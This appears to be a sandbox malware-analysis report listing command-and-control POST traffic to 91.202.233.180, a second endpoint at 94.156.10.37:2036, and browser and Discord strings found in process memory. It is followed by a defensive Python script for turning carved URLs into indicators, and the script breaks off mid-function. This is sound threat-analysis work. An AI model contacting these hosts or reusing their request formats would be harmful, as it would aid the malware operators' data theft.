Source: global traffic HTTP traffic detected: POST /g88sks2SaM/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.202.233.180Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 43 33 45 45 33 35 45 30 35 45 39 36 37 46 32 45 43 37 38 35 39 38 32 42 36 37 39 34 43 37 33 42 32 41 43 42 43 31 37 30 37 42 32 30 33 36 44 41 42 44 41 36 43 33 34 36 43 42 42 34 35 43 31 30 31 32 35 41 39 39 32 30 39 46 36 37 44 38 33 32 36 34 41 35 42 33 45 42 34 45 43 35 42 33 34 42 41 35 42 37 46 39 45 34 32 32 33 45 45 31 36 30 43 34 45 38 35 36 33 31 36 31 38 42 45 35 39 44 35 42 31 46 43 41 30 31 35 36 37 41 43 39 30 39 35 37 33 39 36 44 46 33 Data Ascii: r=C3EE35E05E967F2EC785982B6794C73B2ACBC1707B2036DABDA6C346CBB45C10125A99209F67D83264A5B3EB4EC5B34BA5B7F9E4223EE160C4E85631618BE59D5B1FCA01567AC90957396DF3
Source: global traffic HTTP traffic detected: POST /g88sks2SaM/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----ODYzOTI=Host: 91.202.233.180Content-Length: 86544Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /g88sks2SaM/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.202.233.180Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /g88sks2SaM/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.202.233.180Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 43 33 45 45 33 35 45 30 35 45 39 36 37 46 32 45 43 37 38 35 39 38 32 42 36 37 39 34 43 37 33 42 32 41 43 42 43 31 37 30 37 42 32 30 33 36 44 41 42 44 41 36 43 33 34 36 43 42 42 34 35 43 31 30 31 32 35 41 39 39 32 30 39 46 36 37 44 38 33 32 36 34 41 35 42 33 45 42 34 45 43 35 42 33 34 42 41 35 42 37 46 39 45 34 32 32 33 45 45 31 36 30 43 34 45 38 35 36 33 31 36 31 38 42 45 35 39 44 35 42 31 46 43 41 30 31 35 36 37 41 43 39 30 39 35 37 33 39 36 44 46 33 Data Ascii: r=C3EE35E05E967F2EC785982B6794C73B2ACBC1707B2036DABDA6C346CBB45C10125A99209F67D83264A5B3EB4EC5B34BA5B7F9E4223EE160C4E85631618BE59D5B1FCA01567AC90957396DF3
Source: global traffic HTTP traffic detected: POST /g88sks2SaM/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.202.233.180Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /g88sks2SaM/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.202.233.180Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 43 33 45 45 33 35 45 30 35 45 39 36 37 46 32 45 43 37 38 35 39 38 32 42 36 37 39 34 43 37 33 42 32 41 43 42 43 31 37 30 37 42 32 30 33 36 44 41 42 44 41 36 43 33 34 36 43 42 42 34 35 43 31 30 31 32 35 41 39 39 32 30 39 46 36 37 44 38 33 32 36 34 41 35 42 33 45 42 34 45 43 35 42 33 34 42 41 35 42 37 46 39 45 34 32 32 33 45 45 31 36 30 43 34 45 38 35 36 33 31 36 31 38 42 45 35 39 44 35 42 31 46 43 41 30 31 35 36 37 41 43 39 30 39 35 37 33 39 36 44 46 33 Data Ascii: r=C3EE35E05E967F2EC785982B6794C73B2ACBC1707B2036DABDA6C346CBB45C10125A99209F67D83264A5B3EB4EC5B34BA5B7F9E4223EE160C4E85631618BE59D5B1FCA01567AC90957396DF3
Source: global traffic HTTP traffic detected: POST /g88sks2SaM/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.202.233.180Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /g88sks2SaM/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.202.233.180Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 43 33 45 45 33 35 45 30 35 45 39 36 37 46 32 45 43 37 38 35 39 38 32 42 36 37 39 34 43 37 33 42 32 41 43 42 43 31 37 30 37 42 32 30 33 36 44 41 42 44 41 36 43 33 34 36 43 42 42 34 35 43 31 30 31 32 35 41 39 39 32 30 39 46 36 37 44 38 33 32 36 34 41 35 42 33 45 42 34 45 43 35 42 33 34 42 41 35 42 37 46 39 45 34 32 32 33 45 45 31 36 30 43 34 45 38 35 36 33 31 36 31 38 42 45 35 39 44 35 42 31 46 43 41 30 31 35 36 37 41 43 39 30 39 35 37 33 39 36 44 46 33 Data Ascii: r=C3EE35E05E967F2EC785982B6794C73B2ACBC1707B2036DABDA6C346CBB45C10125A99209F67D83264A5B3EB4EC5B34BA5B7F9E4223EE160C4E85631618BE59D5B1FCA01567AC90957396DF3
Source: global traffic HTTP traffic detected: POST /g88sks2SaM/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----ODYzOTI=Host: 91.202.233.180Content-Length: 86544Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /g88sks2SaM/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.202.233.180Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /g88sks2SaM/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.202.233.180Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 43 33 45 45 33 35 45 30 35 45 39 36 37 46 32 45 43 37 38 35 39 38 32 42 36 37 39 34 43 37 33 42 32 41 43 42 43 31 37 30 37 42 32 30 33 36 44 41 42 44 41 36 43 33 34 36 43 42 42 34 35 43 31 30 31 32 35 41 39 39 32 30 39 46 36 37 44 38 33 32 36 34 41 35 42 33 45 42 34 45 43 35 42 33 34 42 41 35 42 37 46 39 45 34 32 32 33 45 45 31 36 30 43 34 45 38 35 36 33 31 36 31 38 42 45 35 39 44 35 42 31 46 43 41 30 31 35 36 37 41 43 39 30 39 35 37 33 39 36 44 46 33 Data Ascii: r=C3EE35E05E967F2EC785982B6794C73B2ACBC1707B2036DABDA6C346CBB45C10125A99209F67D83264A5B3EB4EC5B34BA5B7F9E4223EE160C4E85631618BE59D5B1FCA01567AC90957396DF3
Source: global traffic HTTP traffic detected: POST /g88sks2SaM/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----ODYzOTI=Host: 91.202.233.180Content-Length: 86544Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /g88sks2SaM/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.202.233.180Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /g88sks2SaM/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.202.233.180Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 43 33 45 45 33 35 45 30 35 45 39 36 37 46 32 45 43 37 38 35 39 38 32 42 36 37 39 34 43 37 33 42 32 41 43 42 43 31 37 30 37 42 32 30 33 36 44 41 42 44 41 36 43 33 34 36 43 42 42 34 35 43 31 30 31 32 35 41 39 39 32 30 39 46 36 37 44 38 33 32 36 34 41 35 42 33 45 42 34 45 43 35 42 33 34 42 41 35 42 37 46 39 45 34 32 32 33 45 45 31 36 30 43 34 45 38 35 36 33 31 36 31 38 42 45 35 39 44 35 42 31 46 43 41 30 31 35 36 37 41 43 39 30 39 35 37 33 39 36 44 46 33 Data Ascii: r=C3EE35E05E967F2EC785982B6794C73B2ACBC1707B2036DABDA6C346CBB45C10125A99209F67D83264A5B3EB4EC5B34BA5B7F9E4223EE160C4E85631618BE59D5B1FCA01567AC90957396DF3
Source: global traffic HTTP traffic detected: POST /g88sks2SaM/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.202.233.180Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /g88sks2SaM/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.202.233.180Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 43 33 45 45 33 35 45 30 35 45 39 36 37 46 32 45 43 37 38 35 39 38 32 42 36 37 39 34 43 37 33 42 32 41 43 42 43 31 37 30 37 42 32 30 33 36 44 41 42 44 41 36 43 33 34 36 43 42 42 34 35 43 31 30 31 32 35 41 39 39 32 30 39 46 36 37 44 38 33 32 36 34 41 35 42 33 45 42 34 45 43 35 42 33 34 42 41 35 42 37 46 39 45 34 32 32 33 45 45 31 36 30 43 34 45 38 35 36 33 31 36 31 38 42 45 35 39 44 35 42 31 46 43 41 30 31 35 36 37 41 43 39 30 39 35 37 33 39 36 44 46 33 Data Ascii: r=C3EE35E05E967F2EC785982B6794C73B2ACBC1707B2036DABDA6C346CBB45C10125A99209F67D83264A5B3EB4EC5B34BA5B7F9E4223EE160C4E85631618BE59D5B1FCA01567AC90957396DF3
Source: global traffic HTTP traffic detected: POST /g88sks2SaM/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----ODYzOTI=Host: 91.202.233.180Content-Length: 86544Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /g88sks2SaM/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.202.233.180Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /g88sks2SaM/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----OTI0OTQ=Host: 91.202.233.180Content-Length: 92646Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /g88sks2SaM/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----ODYzOTY=Host: 91.202.233.180Content-Length: 86548Cache-Control: no-cache
Source: Joe Sandbox View ASN Name: NETERRA-ASBG NETERRA-ASBG
Source: Joe Sandbox View ASN Name: M247GB M247GB
Source: unknown DNS traffic detected: query: hnlhrsLvnXQMkLSbq.hnlhrsLvnXQMkLSbq replaycode: Name error (3)
Source: unknown TCP traffic detected without corresponding DNS query: 91.202.233.180
Source: C:\Windows\System32\OpenWith.exe Code function: 20_3_00007DF4B63B21BC WSARecv, 20_3_00007DF4B63B21BC
Source: unknown DNS traffic detected: queries for: hnlhrsLvnXQMkLSbq.hnlhrsLvnXQMkLSbq
Source: unknown HTTP traffic detected: POST /g88sks2SaM/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.202.233.180Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: Dctooux.exe, 00000017.00000002.2949713341.0000000000D9D000.00000004.00000020.00020000.00000000.sdmp, Dctooux.exe, 00000017.00000002.2949713341.0000000000D1E000.00000004.00000020.00020000.00000000.sdmp, Dctooux.exe, 00000017.00000002.2950687213.00000000031B5000.00000004.00000020.00020000.00000000.sdmp, Dctooux.exe, 00000017.00000002.2949713341.0000000000D77000.00000004.00000020.00020000.00000000.sdmp, Dctooux.exe, 00000017.00000003.2567419623.0000000000D9D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.202.233.180/g88sks2SaM/index.php
Source: Dctooux.exe, 00000017.00000002.2949713341.0000000000D9D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.202.233.180/g88sks2SaM/index.php/
Source: Dctooux.exe, 00000017.00000002.2949713341.0000000000D67000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.202.233.180/g88sks2SaM/index.php3G
Source: Dctooux.exe, 00000017.00000002.2949713341.0000000000D77000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.202.233.180/g88sks2SaM/index.php?scr=1
Source: Dctooux.exe, 00000017.00000002.2949713341.0000000000D77000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.202.233.180/g88sks2SaM/index.php?scr=17e
Source: Dctooux.exe, 00000017.00000002.2949713341.0000000000D77000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.202.233.180/g88sks2SaM/index.php?scr=19
Source: Dctooux.exe, 00000017.00000002.2949713341.0000000000D77000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.202.233.180/g88sks2SaM/index.php?scr=19Gf
Source: Dctooux.exe, 00000017.00000002.2949713341.0000000000D77000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.202.233.180/g88sks2SaM/index.php?scr=19IfYj
Source: Dctooux.exe, 00000017.00000002.2949713341.0000000000D77000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.202.233.180/g88sks2SaM/index.php?scr=19aeqk
Source: Dctooux.exe, 00000017.00000002.2949713341.0000000000D77000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.202.233.180/g88sks2SaM/index.php?scr=19mfuj
Source: Dctooux.exe, 00000017.00000002.2949713341.0000000000D1E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.202.233.180/g88sks2SaM/index.php?scr=1=1
Source: Dctooux.exe, 00000017.00000002.2950449104.0000000002A5E000.00000004.00000010.00020000.00000000.sdmp String found in binary or memory: http://91.202.233.180/g88sks2SaM/index.php?scr=1D
Source: Dctooux.exe, 00000017.00000002.2949713341.0000000000E0C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.202.233.180/g88sks2SaM/index.php?scr=1on
Source: Dctooux.exe, 00000017.00000002.2949713341.0000000000D67000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.202.233.180/g88sks2SaM/index.phpOF
Source: Dctooux.exe, 00000017.00000002.2949713341.0000000000D9D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.202.233.180/g88sks2SaM/index.phpT
Source: Dctooux.exe, 00000017.00000002.2949713341.0000000000D9D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.202.233.180/g88sks2SaM/index.phpc
Source: Dctooux.exe, 00000017.00000002.2949713341.0000000000D77000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.202.233.180/g88sks2SaM/index.phpded
Source: Dctooux.exe, 00000017.00000002.2949713341.0000000000D67000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.202.233.180/g88sks2SaM/index.phpic
Source: Dctooux.exe, 00000017.00000002.2949713341.0000000000D77000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.202.233.180/g88sks2SaM/index.phpoded
Source: Dctooux.exe, 00000017.00000002.2949713341.0000000000D77000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.202.233.180/g88sks2SaM/index.phpodedJdUk
Source: Dctooux.exe, 00000017.00000002.2949713341.0000000000D9D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.202.233.180/g88sks2SaM/index.phps
Source: Dctooux.exe, 00000017.00000002.2949713341.0000000000D67000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.202.233.180/g88sks2SaM/index.phpsF
Source: Publication.0.dr String found in binary or memory: http://crl.globalsign.com/gs/gstimestampingsha2g2.crl0
Source: Publication.0.dr String found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
Source: Publication.0.dr String found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
Source: Publication.0.dr String found in binary or memory: http://crl.globalsign.net/root-r3.crl0
Source: J2NWKU2oJi.exe String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: Publication.0.dr String found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
Source: Publication.0.dr String found in binary or memory: http://ocsp2.globalsign.com/gstimestampingsha2g20
Source: Publication.0.dr String found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: Publication.0.dr String found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
Source: Publication.0.dr String found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingsha2g2.crt0
Source: Pleasure.pif, 0000000A.00000000.1724862263.0000000000219000.00000002.00000001.01000000.00000006.sdmp, Publication.0.dr, Pleasure.pif.1.dr String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: dialer.exe, 00000010.00000002.2280099668.00000000027AC000.00000004.00000010.00020000.00000000.sdmp, dialer.exe, 00000010.00000002.2280467763.0000000002E98000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, OpenWith.exe, 00000014.00000003.2380401073.000001BD77781000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2388372359.000001BD77781000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2383846923.000001BD77781000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2382259358.000001BD77781000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2379080486.000001BD77781000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2381455788.000001BD77781000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2330137003.000001BD77781000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2377146496.000001BD77781000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2380016439.000001BD77781000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000002.2584550230.000001BD7778C000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2376868468.000001BD77781000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2378806137.000001BD77781000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2518893814.000001BD77785000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2580212347.000001BD7778B000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2388588718.000001BD77786000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000002.2583114275.000001BD75700000.00000040.00000001.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2378242743.000001BD77781000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2386577450.000001BD77781000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://94.156.10.37:2036/efc85e6acdfc3a785/1evgkhav.3ltvh
Source: dialer.exe, 00000010.00000002.2280099668.00000000027AC000.00000004.00000010.00020000.00000000.sdmp String found in binary or memory: https://94.156.10.37:2036/efc85e6acdfc3a785/1evgkhav.3ltvhD
Source: dialer.exe, 00000010.00000002.2280467763.0000000002E98000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000002.2583114275.000001BD75700000.00000040.00000001.00020000.00000000.sdmp String found in binary or memory: https://94.156.10.37:2036/efc85e6acdfc3a785/1evgkhav.3ltvhkernelbasentdllkernel32GetProcessMitigatio
Source: OpenWith.exe, 00000014.00000003.2377428787.000001BD77963000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: OpenWith.exe, 00000014.00000003.2377428787.000001BD77963000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: OpenWith.exe, 00000014.00000003.2377428787.000001BD77963000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: OpenWith.exe, 00000014.00000003.2377428787.000001BD77963000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: OpenWith.exe, 00000014.00000003.2387709304.000001BD77943000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://discord.com
Source: OpenWith.exe, 00000014.00000003.2387709304.000001BD77943000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://discordapp.com
Source: OpenWith.exe, 00000014.00000003.2377428787.000001BD77963000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: OpenWith.exe, 00000014.00000003.2377428787.000001BD77963000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: OpenWith.exe, 00000014.00000003.2377428787.000001BD77963000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: OpenWith.exe, 00000014.00000002.2583993168.000001BD776C7000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2580503855.000001BD776C7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://go.micro
Source: OpenWith.exe, 00000014.00000003.2388299627.000001BD776F8000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2388098872.000001BD776F5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://support.mic
Source: OpenWith.exe, 00000014.00000003.2379186659.000001BD776D6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://support.office
Source: OpenWith.exe, 00000014.00000003.2436109596.000001BD77774000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-21
Source: OpenWith.exe, 00000014.00000003.2378806137.000001BD776C4000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2381455788.000001BD776D5000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2378601917.000001BD77A00000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2379297840.000001BD77999000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2412338349.000001BD77770000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2386577450.000001BD776F5000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2383846923.000001BD776F5000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2436178442.000001BD776AA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: OpenWith.exe, 00000014.00000003.2378645142.000001BD77974000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: OpenWith.exe, 00000014.00000003.2381455788.000001BD776D5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016y
Source: OpenWith.exe, 00000014.00000003.2381455788.000001BD776D5000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2378601917.000001BD77A00000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2379297840.000001BD77999000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2412338349.000001BD77770000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2386577450.000001BD776F5000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2378806137.000001BD776F5000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2383846923.000001BD776F5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: OpenWith.exe, 00000014.00000003.2380609962.000001BD776DA000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2382259358.000001BD776DA000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2380401073.000001BD776D4000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2384215921.000001BD776E0000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2381455788.000001BD776D5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e171
Source: OpenWith.exe, 00000014.00000003.2378645142.000001BD77974000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: OpenWith.exe, 00000014.00000002.2583923900.000001BD776AA000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2387896301.000001BD776A4000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2412273638.000001BD776A8000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2382101034.000001BD776A2000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2436178442.000001BD776AA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17N-SiX4Yyn3iFo5fv-Rsj0cGE-FFrP
Source: OpenWith.exe, 00000014.00000003.2379186659.000001BD776F5000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2378806137.000001BD776F5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17t.mc_id=EnterPK201694ba2e0b-6
Source: Publication.0.dr String found in binary or memory: https://www.autoitscript.com/autoit3/
Source: OpenWith.exe, 00000014.00000003.2377428787.000001BD77963000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: Publication.0.dr String found in binary or memory: https://www.globalsign.com/repository/0
Source: Publication.0.dr String found in binary or memory: https://www.globalsign.com/repository/06
Source: OpenWith.exe, 00000014.00000003.2377428787.000001BD77963000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
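The URL strings above were carved from process memory, so most of them carry trailing bytes from whatever data sat next to them (index.phpOF, ?scr=19Gf, 3ltvhD) and some are two strings fused together (the ecosia favicon and search URLs). The script below is an added editor's example, not code from the Joe Sandbox report: it collapses such lines into one record per scheme and host, recovers the longest path prefix shared by the variants, keeps the junk suffixes for review, and flags IP-literal hosts as C2 candidates. SAMPLE_LINES is a constructed subset copied from the report lines above; the function names and record layout are this example's own.

```python
"""Collapse memory-carved URL strings from a sandbox report into usable IOCs.

Added editor's example, not code from the Joe Sandbox report. SAMPLE_LINES is a
constructed subset copied from the report's "String found in binary or memory"
lines; everything else (function names, record layout) is this example's own.
"""
import ipaddress
import os
import re
from collections import defaultdict
from urllib.parse import urlsplit

SAMPLE_LINES = [
    "Source: Dctooux.exe, 00000017.00000002.2949713341.0000000000D67000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.202.233.180/g88sks2SaM/index.php3G",
    "Source: Dctooux.exe, 00000017.00000002.2949713341.0000000000D77000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.202.233.180/g88sks2SaM/index.php?scr=1",
    "Source: Dctooux.exe, 00000017.00000002.2949713341.0000000000D77000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.202.233.180/g88sks2SaM/index.php?scr=19",
    "Source: Dctooux.exe, 00000017.00000002.2949713341.0000000000D77000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.202.233.180/g88sks2SaM/index.php?scr=19Gf",
    "Source: Dctooux.exe, 00000017.00000002.2949713341.0000000000D1E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.202.233.180/g88sks2SaM/index.php?scr=1=1",
    "Source: Dctooux.exe, 00000017.00000002.2949713341.0000000000D67000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.202.233.180/g88sks2SaM/index.phpOF",
    "Source: Dctooux.exe, 00000017.00000002.2949713341.0000000000D77000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.202.233.180/g88sks2SaM/index.phpodedJdUk",
    "Source: dialer.exe, 00000010.00000002.2280099668.00000000027AC000.00000004.00000010.00020000.00000000.sdmp String found in binary or memory: https://94.156.10.37:2036/efc85e6acdfc3a785/1evgkhav.3ltvhD",
    "Source: dialer.exe, 00000010.00000002.2280467763.0000000002E98000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://94.156.10.37:2036/efc85e6acdfc3a785/1evgkhav.3ltvhkernelbasentdllkernel32GetProcessMitigatio",
    "Source: Publication.0.dr String found in binary or memory: http://crl.globalsign.com/gs/gstimestampingsha2g2.crl0",
    "Source: OpenWith.exe, 00000014.00000003.2377428787.000001BD77963000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=",
    "Source: OpenWith.exe, 00000014.00000003.2378645142.000001BD77974000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples",
    "Source: OpenWith.exe, 00000014.00000003.2378645142.000001BD77974000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install",
]

MARK = "String found in binary or memory: "
# A carved string can be two URLs fused together; split at every scheme prefix.
FUSED_RE = re.compile(r"https?://(?:(?!https?://)\S)+")


def extract_urls(lines):
    """Return every URL after the report marker, splitting fused strings."""
    urls = []
    for line in lines:
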